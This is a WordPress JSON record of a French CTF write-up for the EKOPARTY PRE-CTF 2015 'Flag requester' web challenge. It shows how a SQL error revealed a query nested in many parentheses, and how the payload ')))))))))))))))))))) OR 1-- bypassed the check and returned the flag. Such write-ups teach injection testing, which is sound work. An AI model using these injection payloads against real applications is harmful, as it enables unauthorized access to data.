{"id":1243,"date":"2015-09-23T00:29:02","date_gmt":"2015-09-22T22:29:02","guid":{"rendered":"https:\/\/0x90r00t.com\/fr\/?p=1243"},"modified":"2015-09-23T02:56:41","modified_gmt":"2015-09-23T00:56:41","slug":"ekoparty-pre-ctf-2015-web-25-flag-requester-write-up","status":"publish","type":"post","link":"https:\/\/0x90r00t.com\/fr\/2015\/09\/23\/ekoparty-pre-ctf-2015-web-25-flag-requester-write-up\/","title":{"rendered":"[EKOPARTY PRE-CTF 2015] [Web 25 \u2013 Flag requester] Write Up"},"content":{"rendered":"<h2>Description<\/h2>\n<blockquote><p>Go and get your flag!<\/p><\/blockquote>\n<p><!--more--><\/p>\n<h2>Resolution<\/h2>\n<p>Nous nous retrouvons devant un simple input.<\/p>\n<p>Il faut r\u00e9cup\u00e9rer le flag, testons avec le fameux caract\u00e8re \u00ab\u00a0&lsquo;\u00a0\u00bb que les SGBD d\u00e9testent, afin de voir si une injection SQL est possible.<\/p>\n<p>Apr\u00e8s validation du formulaire, une erreur de syntaxe nous est retourn\u00e9e :<\/p>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">ERROR: near &quot;'))))))))))))))))))))&quot;: syntax error<\/pre>\n<p>Qu&rsquo;est-ce que \u00e7a veut dire toutes ces parenth\u00e8ses ? Est-ce que la requ\u00eate serait de type :<\/p>\n<pre class=\"brush: sql; title: ; notranslate\" title=\"\">SELECT user, password FROM users WHERE credz = (((((((((((((((((((('$input'))))))))))))))))))))<\/pre>\n<p>On passe alors le bon nombre de parenth\u00e8ses de fermeture ainsi que le n\u00e9cessaire pour passer la comparaison : <code>')))))))))))))))))))) OR 1--<\/code><\/p>\n<p>Et \u00e7a passe \ud83d\ude09<\/p>\n<p><code>Le flag est : EKO{sqli_with_a_lot_of_)}<\/code><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Description Go and get your flag!<\/p>\n","protected":false},"author":9,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[34,35,70],"tags":[88,19,57],"class_list":["post-1243","post","type-post","status-publish","format-standard","hentry","category-2015-fr","category-ctf-fr","category-ekoparty","tag-parentheses","tag-web","tag-sql"],"_links":{"self":[{"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/posts\/1243","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/users\/9"}],"replies":[{"embeddable":true,"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/comments?post=1243"}],"version-history":[{"count":4,"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/posts\/1243\/revisions"}],"predecessor-version":[{"id":1277,"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/posts\/1243\/revisions\/1277"}],"wp:attachment":[{"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/media?parent=1243"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/categories?post=1243"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/tags?post=1243"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}